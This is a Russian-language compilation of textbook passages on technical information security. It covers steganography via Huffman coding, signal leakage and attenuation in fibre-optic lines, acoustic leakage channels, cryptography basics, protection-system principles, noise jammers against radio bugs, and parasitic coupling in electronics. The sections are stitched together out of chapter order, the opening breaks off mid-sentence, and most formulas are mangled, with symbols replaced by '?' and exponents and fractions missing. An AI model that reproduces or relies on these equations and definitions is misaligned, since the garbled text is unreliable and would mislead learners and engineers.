Регулярные функции имитации можно смоделировать с помощью схемы кодирования по Хаффману. Известно, что любой язык обладает некоторыми статистическими свойствами. Этот факт используется многими методами сжатия данных. Если на алфавите S задано распределение вероятностей A, то можно воспользоваться схемой кодирования по Хаффману для создания функции сжатия с минимальной избыточностью fA:S®{0,1}*, где символ * используется в смысле S*=Èi³0{x1…xi|x1,…,xiÎS}. Такую функцию можно построить на основе функции сжатия Хаффмана: G(x)=fB(fA(x)).
Таким образом, секретный файл можно сжать по схеме Хаффмана с распределением A, в результате чего получится файл двоичных строк, которые могут интерпретироваться как результат операции сжатия некоторого файла с распределением B. Этот файл может быть восстановлен с применением инверсной функции сжатия fB к файлу двоичных строк и использоваться в дальнейшем как стеганограмма. Если функции fA и fB являются взаимно однозначными, то и созданная функция имитации будет также взаимно однозначна. Доказано, что построенная таким образом функция подобия оптимальна в том смысле, что если функция сжатия Хаффмана fA
Оптические излучатели
Рис. 4.6. Типы волн, распространяющихся по световодам |
В волоконно-оптических линиях связи (ВОЛС) существуют волны трех типов: направляемые, вытекающие и излучаемые (рис. 4.6).
Направляемые волны — это основной тип волны, распространяющейся по ВОЛС.
Излучаемые волны возникают при вводе света в волновод. Здесь определенная часть энергии уже в начале линии излучается в окружающее пространство и не распространяется вдоль световода. Это связано с дополнительными потерями энергии и приводит к возможности приема излучаемых в пространство сигналов.
Вытекающие волны частично распространяются вдоль волновода, а частично переходят в оболочку и распространяются в ней или выходят наружу. Причины возникновения излучения (утечки световой информации) в разъемных соединениях ВОЛС представлены на рис. 4.7.
Все эти причины приводят к излучению световых сигналов в окружающее пространство, что приводит к затуханию, или потере, полезного сигнала в волоконно-оптических линиях связи (ВОЛС).
Исходя из особенностей оптического волокна (ОВ), модель затухания сигнала в ВОЛС должна включать в себя две части:
затухание оптического сигнала (ОС), обусловленное физическими особенностями ОВ;
затухание ОС, обусловленное преднамеренными действиями на ОВ потенциального нарушителя.
а) радиальная несогласованность стыкуемых волокон;
б) угловая несогласованность осей световодов; в) наличие зазора между торцами световода; г) наличие взаимной непараллельности торцов волокон; д) разница в диаметрах сердечников стыкуемых волокон. |
Рис. 4.7. Причины возникновения излучения в ВОЛС
Затухание ОС за счет физических особенностей ОВ обусловлено существованием потерь при передаче информации.
При распространении оптического импульса вдоль однородного волокна мощность P и энергия W импульса уменьшаются из-за потерь энергии, вызванных рассеянием и поглощением по экспоненциальному закону (закон Бугера, рис. 4.8) и определяется, как
P(L) = P(0) e, W(L) = W(0) e
Рис. 4.8. Закон Бугера.
Зависимость мощностей световых импульсов от расстояния вдоль волокна на длинах волн 1550 нм, 1300 нм и 985 нм
Здесь P(L) — мощность излучения на расстоянии L; P(0) — мощность излучения в начальной точке; ? — коэффициент затухания, определяемый выражением:
? = ln
В единицах дБ/км коэффициент ослабления ? может быть выражен, как
? = log = 4.343? (км)
Зависимость коэффициента затухания от длины волны проиллюстрирована на рис. 4.9.
Рис. 4.9. Зависимость коэффициента затухания от длины волны
Затухание света в ОВ включает в себя потери на поглощение, потери на рассеяние и кабельные потери. В свою очередь, потери на поглощение (?) и на рассеяние (?) вместе определяются, как собственные потери (?), а кабельные потери (?) и потери, связанные с несанкционированным доступом (НСД), в силу их физической природы, можно назвать дополнительными потерями (?).
Затухание сигнала в ОВ зависит от длины волны и составляет 0,5 дБ/км для 1300 нм и 0,3 дБ/км для 1550 нм стандартного одномодового волокна (сплошная линия). Это волокно имеет пик затухания в области 1400 нм, который является результатом поглощения энергии молекулами воды. Пунктирной линией на рис. 4.9 показано затухание для волокна AllWave®, свободного от воды.
Таким образом, полное затухание в ОВ с учетом НСД можно представить в следующем виде:
? = ? + ? = ? + ? + ? + ?
Потери на поглощение ? состоят из потерь в кварцевом стекле, которые определяются, как ультрафиолетовое и инфракрасное поглощение, а также из потерь, связанных с поглощением оптической энергии на примесях (?). Потери в кварцевом стекле вызываются собственным поглощением атомами оптического материала — кварца (?) и поглощением атомными дефектами в стеклянном составе (?)).
? = ? + ? + ?
Основной реакцией стекловолокна на атомное излучение является увеличение затухания оптической энергии вследствие создания атомных дефектов, или центров ослабления, которые поглощают оптическую энергию.
Поглощение на примесях (загрязнениях) возникает преимущественно от ионов металла и от OH (водяных) ионов.
Примеси металла обуславливают потери от 1 до 10 дБ/км.
Ранее ОВ имели высокий уровень содержания OH-ионов, который приводил к большим пикам поглощения на длинах волн 1400, 950 и 725 нм. Путем уменьшения остаточного содержания OH-ионов в волокне (для одномодовых волокон — около 1 части на миллиард), в настоящее время ОВ имеют номинальные затухания 0,5 дБ/км в 1300 нм и 0,3 дБ/км в 1550 нм, как показано сплошной линией на рис. 4.9. Следует обратить внимание на центр примеси в районе 1480 нм, который является примесью OH-ионов в волокне. На этой длине волны всегда присутствует пик поглощения в кварцевом волокне.
Так называемые центры примеси, в зависимости от типа примеси, поглощают световую энергию на определенных, присущих данной примеси, длинах волн и рассеивают ее в виде тепловой энергии.
Собственное поглощение атомами оптического материала включает в себя:
поглощение электронов в ультрафиолетовой области;
поглощение электронов на границе инфракрасной области.
Ультрафиолетовая граница поглотительных полос электронов, в соответствии с законом Урбача, определяется как:
? = С e,
где С и E — эмпирические постоянные, а E — энергия фотона.
Характерное распределение ультрафиолетового поглощения представлено на рис. 4.10.
Значение затухания в ультрафиолетовой области мало, по сравнению с затуханием в инфракрасной области, для малых значений энергии фотона. Собственные потери на поглощение возрастают при увеличении длины волны излучения и становятся значительными в ультрафиолетовой и инфракрасной областях. Так при длине волны излучения больше 1,6 мкм обычное кварцевое стекло теряет свойство прозрачности из-за роста потерь, которые связаны с инфракрасным поглощением (рис. 4.11).
Рис. 4.10. Распределение ультрафиолетового и инфракрасного поглощения
Рис. 4.11. Сравнение инфракрасного поглощения,
вызванного различными примесями
На рис. 4.12 представлена зависимость потерь от длины волны излучения для ОВ из кварцевого стекла с предельно малыми потерями и многокомпонентных ОВ, изготовленных из различных оптических материалов.
Рассеивание представляет собой процесс удаления части энергии из распространяющейся волны с последующей эмиссией некоторой части этой энергии.
Рис. 4.12. Зависимость потерь от длины волны для различных материалов
Источники возникновения рассеяния в ОВ:
маленькие газовые пузырьки;
неоднородный состав оптического материала;
изгиб ОВ.
Потери на рассеяние становятся определяющим фактором затухания в волокне уже в 1970 г., когда была достигнута чистота ОВ порядка 99,9999%.
Дальнейшему уменьшению затухания препятствовали потери на рассеяние. В общем виде потери на рассеяние определяются следующим выражением.
? = ? + ? + ? + ?+ ? + ?
Здесь под ? подразумеваются потери, обусловленные Релеевским рассеиванием. Причиной Релеевского рассеяния является то, что атомы в стекле (SiO) имеют случайное пространственное распределение, и локальные изменения в составе приводят к локальному изменению индекса преломления, что и вызывает рассеяние оптической энергии. Поэтому волны малой длины должны больше рассеиваться и, следовательно, иметь более высокие потери, чем волны с большей длиной. ? — потери, обусловленные Ми-рассеянием. Данный тип линейного рассеяния возникает на ионах примеси, размер которых сравним с длиной волны. В высококачественных ОВ такие потери отсутствуют. ? — суммарные потери, обусловленные микро- (?) и макро- (?) изгибами ОВ, определяются выражением:
? = ? + ?
Микроизгибы возникают в процессе изготовления ОВ и при формировании пластикового конверта в процессе изготовления оптического кабеля. Макроизгибы возникают в процессе прокладки оптического кабеля и являются функцией от радиуса изгиба ОВ. Тогда потери на макроизгибах можно представить выражением:
? = 2 ? + ? + ?,
где ?— потери, обусловленные переходами от прямого участка световода к изогнутому, а также от изогнутого к прямому участку; ? — потери на изогнутом участке ОВ; ? — потери, обусловленные наличием микротрещин.
? — суммарные потери, обусловленные стыковкой ОВ и определяемые внутренними (?) и внешними (?) потерями согласно выражения:
? = ? + ?
Внутренние потери определяются трудно контролируемыми факторами — парной вариацией диаметров сердцевин, показателей преломления, числовых апертур, эксцентриситетов “сердцевина — оболочка”, концентричностью сердцевины у соединяемых волокон. Можно получить случайные изменения перечисленных факторов, так как они зависят не от конструкции соединителя, а от технологии производства ОВ.
Причинами внешних потерь являются несовершенства конструкции соединителя, а также процесса сборки ОВ и соединителя. Внешние потери зависят от механической нестыковки (угловое, радиальное и осевое смещение), шероховатости на торце сердцевины, чистоты участка и наличия зазора между торцами стыкуемых ОВ. Наличие зазора приводит к появлению френелевского отражения из-за образования среды с показателем преломления, отличным от показателя преломления ОВ.
? = ? + ? + ? + ?,
где ? — потери, вызванные угловым смещением световодов; ? — потери, вызванные радиальным смещением осей ОВ; ? — потери, вызванные осевым смещением торцов ОВ; ? — потери, обусловленные обратным френелевским отражением.
Учитывая изложенное, выражение для ? примет следующий вид:
? = ? + ? + ? + ? + ?
Суммарные потери, обусловленные стыковкой ОВ, также носят название вносимых потерь.
? — потери, обусловленные вынужденным комбинационным рассеянием. Это рассеяние называется рассеянием Рамана-Мандельштама и возникает в волокне тогда, когда проходящая в нем оптическая мощность достигает некоторого порога. Порог рассеяния зависит от площади поперечного сечения и длины ОВ, а также от коэффициента потерь. Рассеяние распространяется преимущественно в направлении исходного излучения.
? — потери, обусловленные вынужденным рассеянием Мандельштама-Бриллюэна. Физическая суть рассеяния состоит в том, что при достаточно высоком уровне мощности излучения происходит изменение энергетических квантовых состояний молекул и атомов ОВ, выражающееся в колебательном движении молекул. Это приводит к флуктациям плотности вещества, т.е.к возникновению акустических фононов. На этих фононах происходит нелинейное рассеяние света, заключающееся в том, что фотоны отдают часть энергии акустическим фононам, в результате чего в спектре излучения появляются новые компоненты, называемые стоксовыми.
Для обеспечения работоспособности ВОЛС необходимо, чтобы для полного затухания ? сигнала в волоконно-оптическом тракте выполнялись следующие условия:
? = P – P – ? при P ³ P; ?? £ ?
Здесь P — мощность излучения оптического передатчика (дБ/м); P — мощность на входе фотоприемника (дБ/м); ? — эксплуатационный запас (дБ/м); ?? — абсолютное изменение затухания тракта при изменении температуры окружающей среды.
Параметр ? определяет длину регенерационного участка.
Таким образом, величина потерь мощности P в произвольной точке определяются решением системы уравнений:
P =
Глава 5
Классификация радиоканалов утечки информации
Основные определения акустики
Прежде чем переходить к рассмотрению собственно акустических каналов утечки информации, сформулируем основные определения акустики, на которых базируются сведения, приведенные в данной главе.
Звуком называются механические колебание частиц упругой среды (воздуха, воды, металла и т.д.), субъективно воспринимаемые органом слуха. Звуковые ощущения вызываются колебаниями среды, происходящими в диапазоне частот от 16 до 20000 Гц.
Звуковое давление — это переменное давление в среде, обусловленное распространением в ней звуковых волн. Величина звукового давления Р оценивается силой действия звуковой волны на единицу площади и выражается в ньютонах на квадратный метр (1 Н/м2= 10 бар).
Уровень звукового давления отношение величины звукового давления Р к нулевому уровню, за который принято звуковое давление Р= 2 × 10–5 Н/м2
N = 20 lg
Сила (интенсивность) звука — количество звуковой энергии, проходящей за единицу времени через единицу площади; измеряется в ваттах на квадратный метр (Вт/м2). Следует отметить, что звуковое давление и сила звука связаны между собой квадратичной зависимостью, т.е. увеличение звукового давления в 2 раза приводит к увеличению силы звука в 4 раза.
Уровень силы звука — отношение силы данного звука I к нулевому (стандартному) уровню, за который принята сила звука I = 10–12 Вт/м2, выраженное в децибелах (дБ)
N = 10 lg
Уровни звукового давления и силы звука, выраженные в децибелах, совпадают по величине.
Порог слышимости — наиболее тихий звук, который еще способен слышать человек на частоте 1000 Гц, что соответствует звуковому давлению 2 × 10-5
Н/м2.
Громкость звука — интенсивность звукового ощущения, вызванная данным звуком у человека с нормальным слухом. Громкость зависит от силы звука и его частоты, измеряется пропорционально логарифму силы звука и выражается количеством децибел, на которое данный звук превышает по интенсивности звук, принятый за порог слышимости. Единица измерения громкости — фон.
Динамический диапазон — диапазон громкостей звука или разность уровней звукового давления самого громкого и самого тихого звуков, выраженная в децибелах.
Диапазон основных звуковых частот речи лежит в пределах от 70 до 1500 Гц. Однако с учетом обертонов речевой диапазон звучания расширяется до 5000–8000 Гц (рис. 6.1). У русской речи максимум динамического диапазона находится в области частот 300–400 Гц (рис. 6.2).
|
|
||||||||||||||||||
Рис. 6.1. Диапазон звучания обычной речи |
Рис. 6.2. Максимум динамического диапазона русской речи |
||||||||||||||||||
Спектральный уровень речи (табл. 6.1). B = 10 lg = LDF – 10 lg DF ; B = 65 – 10 lg 1000 = 35 дБ Восприятие звука человеком субъективно. Так, люди обладают способностью воспринимать звуковые колебания в очень широких диапазонах частоты и интенсивности. Однако, степень точности, c которой каждый человек может опре- |
Таблица 6.1. Зависимость уровня звучания речи от динамического диапазона
|
Восприятие звука человеком субъективно. Так, люди обладают способностью воспринимать звуковые колебания в очень широких диапазонах частоты и интенсивности. Однако, степень точности, с которой каждый человек может определить высоту звука (частоту звуковых колебаний) на слух, зависит от остроты, музыкальности и тренированности слуха. Помимо этого, чувствительность человеческого уха к различным по частоте звуковым колебаниям неодинакова. Большинство людей лучше всего различают звуки в диапазоне частот от 1000 до 3000 Гц.
Такая характеристика воспринимаемого человеком звука, как громкость, является субъективной оценкой силы звука. Однако громкость зависит не только от интенсивности звука (звукового давления), но еще и от частоты. Субъективность восприятия громкости в зависимости от силы звука подчиняется основному психофизиологическому закону, который устанавливает, что громкость звука растет не пропорционально интенсивности звука, а пропорционально логарифму интенсивности звука.
Источником образования акустического канала утечки информации являются вибрирующие, колеблющиеся тела и механизмы, такие как голосовые связки человека, движущиеся элементы машин, телефонные аппараты, звукоусилительные системы и т.д. Классификация акустических каналов утечки информации представлена на рис. 6.3.
Рис. 6.3. Классификация акустических каналов
Основные понятия
Криптография — наука о методах преобразования (шифрования) информации с целью ее защиты от злоумышленников.
Информация — основное понятие научных направлений, изучающих процессы передачи, переработки и хранения различных данных. Суть понятия информации обычно объясняется на примерах. Формальное определение дать очень сложно, поскольку понятие информации относится к таким же фундаментальным понятиям, как материя.
Информация, которая нуждается в защите, возникает в самых различных жизненных ситуациях. Обычно в таких случаях говорят, что информация содержит тайну или является защищаемой. Для наиболее типичных, часто встречающихся ситуаций введены специальные понятия: государственная тайна, военная тайна, коммерческая тайна, юридическая тайна, врачебная тайна и т.д.
Причем, когда говорят о защищаемой информации, имеют в виду следующие признаки такой информации:
имеется определенный круг законных пользователей, которые имеют право владеть этой информацией;
имеются незаконные пользователи, которые стремятся овладеть этой информацией.
Шифр — способ (метод), преобразования информации с целью ее защиты от незаконных пользователей.
Стеганография — набор средств и методов сокрытия факта передачи сообщения.
Стеганография скрывает сам факт передачи сообщения, а криптография считает, что сообщение (в шифрованном виде) доступно незаконному пользователю, но он не может извлечь из этого сообщения защищаемую информацию.
Первые следы стеганографических методов теряются в глубокой древности. Известен такой способ сокрытия письменного сообщения: рабу брили голову, на коже писали сообщение и после отрастания волос раба отправляли к адресату. Известны различные способы скрытого письма среди строк обычного, незащищенного письма: от молока до сложных химических реактивов с последующей обработкой.
Широко применяется современный метод “микроточки”: сообщение записывается с помощью современной техники на очень маленький носитель — “микроточку”, которая пересылается с обычным письмом, например, над маркой или где-нибудь в другом заранее обусловленном месте.
Один типичный стеганографический прием тайнописи — акростих. Акростихом называется такая организация стихотворного текста, при которой, например, начальные буквы каждой строки образуют скрываемое сообщение.
Сейчас в связи с широким применением ПЭВМ применяются различные методы “запрятывания” защищаемой информации внутри больших ее объемов.
В отличие от стеганографии, криптография занимается методами преобразования информации, которые должны воспрепятствовать противнику в извлечении ее из перехватываемых сообщений. При этом по каналу связи передается уже не сама защищаемая информация, а результат ее преобразования с помощью шифра или кода, и для противника возникает сложная задача вскрытия шифра или кода.
Вскрытие шифра — процесс получения защищаемой информации (открытого текста) из шифрованного сообщения (шифртекста) без знания примененного шифра.
Шифрование — процесс применения шифра и защищаемой информации, т.е. преобразование защищаемой информации в шифрованное сообщение с помощью определенных правил, содержащихся в шифре.
Дешифрирование — процесс, обратный шифрованию, и заключающийся в преобразовании шифрованного сообщения в защищаемую информацию с помощью определенных правил, содержащихся в шифре.
Под ключом в криптографии понимают сменный элемент шифра, который применяют для шифрования конкретных сообщений.
Одно из центральных мест в понятийном аппарате криптографии занимает такое понятие, как стойкость шифра. Под стойкостью шифра понимают способность шифра противостоять всевозможным методам вскрытия. Качественно понять его довольно легко, но получение строгих доказуемых оценок стойкости для каждого конкретного шифра все еще остается нерешенной проблемой. Это объясняется тем, что до сих пор нет математических результатов, необходимых для решения такой проблемы.
Поэтому стойкость конкретного шифра оценивается только путем всевозможных попыток его вскрытия и зависит от квалификации криптоаналитиков, вскрывающих шифр. Подобную процедуру называют проверкой криптостойкости.
Криптология — наука, состоящая из двух направлений: криптографии и криптоанализа. Криптоанализ — это наука (и практика ее применения) о методах и способах вскрытия шифров. Соотношение криптографии и криптоанализа очевидно: криптография — это защита, т.е. разработка шифров, а криптоанализ — нападение, т.е. вскрытие шифров. Однако это две науки связаны друг с другом, и не бывает хороших криптографов, не владеющих методами криптоанализа. Дело в том, что стойкость разработанного шифра можно доказать с помощью проведения различных попыток вскрытия шифра, становясь мысленно в положение противника.
Основные принципы построения системзащиты информации в АС
Опыт создания систем защиты информации (СЗИ) в АС позволяет выделить следующие основные принципы построения СЗИ.
1. Простота механизма защиты. Этот принцип общеизвестен, но не АСегда глубоко осознается. Действительно, некоторые ошибки, не выявленные при проектировании и эксплуатации, позволяют обнаружить неучтенные пути доступа. Необходимо тщательное тестирование программного обеспечения или аппаратных средств защиты, однако на практике такая проверка возможна только для простых и компактных схем.
2. В нормальных условиях доступ к механизму защиты должен отсутствовать, и для работы системы необходимо, чтобы выполнялись определенные условия, при которых доступ к механизму защиты становится невозможным. Кроме того, считается, что запрет доступа при отсутствии особых указаний обеспечивает высокую степень надежности механизма защиты. Ошибка в определении полномочий пользователя в системе защиты, основанной на использовании разрешений, приводит к расширению сферы запретов. Эту ошибку легче обнаружить и она не разрушит общего статуса защиты.
3. Все возможные каналы утечки должны быть перекрыты. Этот принцип предполагает проверку полномочий любого обращения к любому объекту и является основой системы защиты. Защита управления доступом с учетом этого принципа должна решаться на общесистемном уровне. При этом следует учитывать такие режимы работы как: запуск, восстановление после сбоев, выключение и профилактическое обслуживание. Необходимо обеспечить надежное определение источника любого обращения к данным.
4. Механизм защиты можно не засекречивать. Не имеет смысла засекречивать детали реализации систем защиты, предназначенной для широкого использования. Эффективность защиты не должна зависеть от того, насколько опытны потенциальные нарушители. Открытость механизма защиты позволяет при необходимости сделать его предметом обсуждения среди специалистов, не затрагивая при этом интересов пользователей.
5. Разрешение полномочий. Этот принцип заключается в применении нескольких ключей защиты. Наличие нескольких ключей защиты в АС удобно в тех условиях, когда право на доступ определяется выполнением ряда условий.
6. Минимальные полномочия. Для любой программы и любого пользователя должен быть определен минимальный круг полномочий, необходимых для выполнения порученной работы. Вследствие этого в значительной мере уменьшается ущерб, причиняемый при сбоях и случайных нарушениях.
7. Максимальная обоснованность механизма защиты. В целях исключения обмена информацией между пользователями рекомендуется при проектировании схем защиты сводить к минимуму число общих для нескольких пользователей параметров и характеристик механизма защиты.
8. Психологическая привлекательность. Система защиты должна быть простой в эксплуатации. Естественно, чем точнее совпадает представление пользователя о системе защиты с ее фактическими возможностями, тем меньше ошибок возникает в процессе применения.
При построении систем возникают серьезные затруднения, связанные с большими затратами на их реализацию. Поэтому важным фактором при реализации систем защиты является их экономическая эффективность. Поэтому излишнее утяжеление системы дорогостоящими средствами защиты может сделать ее неконкурентоспособной.
Особенности защиты от радиозакладок
Исследования показали, что существующие системы пространственного электромагнитного зашумления на базе генераторов шума (“Равнина-5”, “Гном-1”, “Гном-2”, “Гном-3”, “Шатер”, “Волна” и др.) не обеспечивают подавление технических каналов утечки информации методом сокрытия (маскировки) опасных излучений радиозакладок. Поэтому при разработке требований к аппаратуре подавления радиоизлучающих подслушивающих устройств используется такой показатель, как коэффициент разборчивости речи (WС). На практике используются нормативные значения WС, при которых:
исключается восстановление речевых сообщений (WС £ 0,2);
обеспечивается восстановление речевых сообщений (WС ³ 0,8).
Расчет численных значений используемого показателя осуществляется с помощью следующих соотношений.
WС = , при этом q = ,
где ?, b, S — параметры вида модуляции. При амплитудной модуляции (АМ) ? = 2, S = 0, b = 0,33. При частотной модуляции (ЧМ) ? = 2, S = 0,67(m+1),
b = 3m (m+1), где m = f/?F, ?F — ширина спектра модулирующего сигнала, f — девиация несущей частоты при ЧМ, q и q — отношение сигнал/шум на входе аппаратуры регистрации речевых сообщений и приемного устройства радиоперехвата, соответственно.
Расчет необходимых характеристик аппаратуры подавления производится для следующих условий.
Аппаратура подавления представляет собой генератор (передатчик) шумовых помех, который устанавливается в зашумляемом помещении. При этом расстояние от радиоизлучающих закладок до приемных устройств перехвата их излучений будет практически такое же, как от передатчика шумовых помех до этих подавляемых приемных устройств. При таком тактическом применении передатчика помех полностью снимается неопределенность относительно размещения приемных устройств перехвата излучений радиозакладок, обеспечивается простота использования аппаратуры подавления, высокая надежность и эффективность противодействия.
Полоса пропускания приемных устройств перехвата составляет:
в режиме однополосной телефонии — 5 кГц;
в режиме АМ и узкополосной ЧМ — 15 кГц;
в режиме широкополосной ЧМ — 25, 50, 100 и 180 кГц.
Для типовых радиозакладных устройств расчетные значения параметров ЧМ равны:
?F = ; m = ; S = ; b =
Расчетные показатели имеют значения:
для WС
= 0,2 q = 0,05;
для WС
= 0,8 q = 2,5.
Расчетное значение отношения сигнал/шум на входе приемных устройств радиоперехвата, при котором исключается восстановление речевых сообщений, лежит в диапазоне 0,6–0,7.
Для подавления приемных устройств радиозакладок малой мощности могут быть использованы передатчики заградительных шумовых помех, обеспечивающих требуемое значение отношения сигнал/шум, а также соблюдения санитарных норм и ЭМС (табл. 16.1).
Таблица 16.1. Параметры передатчиков заградительных
шумовых помех для подавления радиозакладок малой мощности
№ литеры |
Диапазон частот литерного передатчика, МГц |
Эквивалентная излучаемая мощность, Вт |
Спектральная плотность помехи, Вт/МГц |
Ширина спектра помехи, МГц |
1 |
88–170 |
10 |
0,12 |
82 |
2 |
380–440 |
10 |
0,12 |
60 |
3 |
1150–1300 |
20 |
0,12 |
150 |
4 |
0,08–0,15 |
0,5 |
5 |
0,07 |
Для подавления приемных устройств радиозакладок средней и большой мощности реализация передатчиков шумовых заградительных помех нецелесообразна из-за невозможности выполнения требований по ЭМС и санитарных норм, а также массогабаритных ограничений. Поэтому в таких случаях применяется помеха, “прицельная по частоте” (табл. 16.2).
Таблица 16.2. Параметры передатчиков заградительных шумовых
помех для подавления радиозакладок средней и большой мощности
Диапазон частот передатчика, МГц |
Эквивалентная излучаемая мощность в одном канале, Вт |
Количество каналов |
Ширина спектра помехи, кГц |
Полная излучаемая мощность, Вт |
Уровень регулировки выходной мощности, дБ |
80–1300 |
0,5 |
2–4 |
12–25 |
1–2 |
10 |
0,08–0,15 |
— |
8 |
50 |
1,5 |
25 |
Паразитные емкостные связи
Паразитные емкостные связи обусловлены электрической емкостью, образующейся между элементами, деталями и проводниками схем, несущих потенциал сигнала (рис. 7.1). Так как сопротивление емкости, создающей паразитную емкостную связь, падает с ростом частоты (X = 1/wC), проходящая через нее энергия с повышением частоты увеличивается. Поэтому паразитная емкостная связь может привести к самовозбуждению усилителя на частотах, превышающих его высшую рабочую частоту.
Чем больше усиление сигнала между цепями и каскадами, имеющими емкостную связь, тем меньше емкости требуется для его самовозбуждения. При усилении в 105 раз (100 дБ) для самовозбуждения усилителя звуковых частот иногда достаточно емкости между входной и выходной цепями порядка 0,01 пФ.
Паразитные индуктивные связи
Паразитные индуктивные связи обусловлены наличием взаимоиндукции между проводниками и деталями РЭО, главным образом между ее трансформаторами. Паразитная индуктивная обратная связь между трансформаторами усилителя — например, между входным и выходным трансформаторами, — может вызвать режим самовозбуждения в области рабочих частот и гармониках.
Рис. 7.1. Схема возникновения паразитной емкостной связи
Для усилителей с малым входным напряжением (микрофонные, магнитофонные и др.) очень опасна индуктивная связь входного трансформатора с источниками переменных магнитных полей (трансформаторы питания). При расположении такого источника вблизи от входного трансформатора ЭДС, которая наводится на вторичной обмотке трансформатора средних размеров, может достигать нескольких милливольт, что в сотни раз превосходит допустимое значение. Значительно слабее паразитная индуктивная связь проявляется при торроидальной конструкции входного трансформатора. При уменьшении размеров трансформатора паразитная индуктивная связь ослабляется.